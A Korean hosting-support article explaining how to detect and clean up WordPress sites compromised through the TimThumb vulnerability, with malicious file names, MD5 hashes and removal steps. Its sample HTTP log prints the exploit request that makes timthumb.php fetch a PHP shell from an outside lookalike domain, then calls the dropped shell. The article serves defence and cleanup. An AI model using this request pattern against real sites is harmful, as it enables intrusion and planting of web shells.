워드프레스 손상: TimThumb

TimThumb은 워드프레스 테마 및 플러그인에서 이미지 크기 변경을 위해 사용되는 도구입니다. 기존 버전의 TimThumb에는 공격자가 다른 웹사이트의 악성(‘불량’) 파일을 업로드할 수 있는 보안 취약성이 있습니다. 첫 번째 불량 파일을 업로드한 후에는 공격자가 더 많은 악성 파일을 호스팅 계정에 업로드할 수 있습니다.

손상에 대한 자세한 정보와 대처 방법은 웹사이트가 해킹당하면 어떻게 하나요?에서 확인할 수 있습니다.

손상 증상

웹사이트가 해킹당하면 어떻게 하나요?에 언급된 증상 외에도, 플러그인 디렉터리에 다음과 같은 패턴이 있는 파일이 계정에 포함되어 있는 경우에도 이러한 손상으로 인해 사이트가 영향을 받았는지 확인할 수 있습니다.

  • external_[md5 hash].php — 예: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — 예: 7eebe45bde5168488ac4010f0d65cea8.php

이 문서의 알려진 악성 파일의 MD5SUM 섹션에서 가능한 md5 해시의 예를 확인할 수 있습니다.

또한 웹사이트의 루트 디렉터리에서도 다음 파일을 찾을 수 있습니다(상세 정보).

  • x.txt
  • logx.txt

해결 방법

손상된 파일과 불량 파일을 전부 제거해야 합니다. 파일을 삭제하기 전에 웹사이트의 백업을 생성하는 것이 좋습니다(상세 정보).

불량 파일 찾기

TimThumb 취약성을 통해 처음 업로드된 불량 파일은 취약한 TimThumb 파일을 포함하는 /theme 또는 /plugin 디렉터리 내에 있는 다음 디렉터리 중 하나에 위치합니다.

  • /tmp
  • /cache
  • /images

불량 파일 위치의 예시:

[webroot]/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/

다음 위치에 있는 불량 파일 이름의 예시:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

파일 x.txtlogx.txt에는 TimThumb 취약성을 사용하여 불량 파일이 생성된 시점과 호스팅 계정 내의 불량 파일 위치에 대한 정보가 포함됩니다. 이 정보는 어떤 파일을 어느 위치에서 찾아 제거해야 하는지를 파악하는 데 도움을 줍니다. 하지만 이를 통해 제거가 필요한 전체 파일 목록을 파악하기는 어렵습니다.

예:

날짜: Thu, 11 Apr 2013 06:21:15 -0700
IP: X.X.X.X
브라우저: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
URL: /wp-content/themes/[취약한 TimThumb이 있는 테마]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

제거할 파일

사이트의 백업을 생성한 후, 다음 파일을 제거합니다.

  • x.txt
  • logx.txt
  • external_[md5 hash].php — 예: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — 예: 7eebe45bde5168488ac4010f0d65cea8.php
  • md5 해시 이름이 지정된 파일과 함께 확인된 다른 악성 PHP 파일.

이 작업은 FTP(상세 정보)를 통해 또는 호스팅 계정의 제어판 내에 있는 파일 관리자를 활용하여 수행할 수 있습니다(상세 정보).

다른 방법:

  • 모든 테마와 플러그인을 최신 버전으로 업데이트합니다.
  • 모든 TimThumb.php 인스턴스를 여기의 최신 버전으로 교체합니다.

기술 정보

HTTP 로그 샘플

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

알려진 악성 파일의 MD5SUM

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

추가 악성 파일

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

이 글이 도움되었나요?
피드백을 보내주셔서 감사합니다. 고객 서비스 담당자에게 문의하시려면 지원 전화 번호 또는 위의 채팅 옵션을 이용하시기 바랍니다.
도와드릴 수 있어 기쁩니다! 더 도와 드릴 것이 있나요?
그것 유감스럽습니다. 혼동이 되었던 사항 또는 솔루션이 고객님의 문제를 해결하지 못했던 원인을 알려주세요.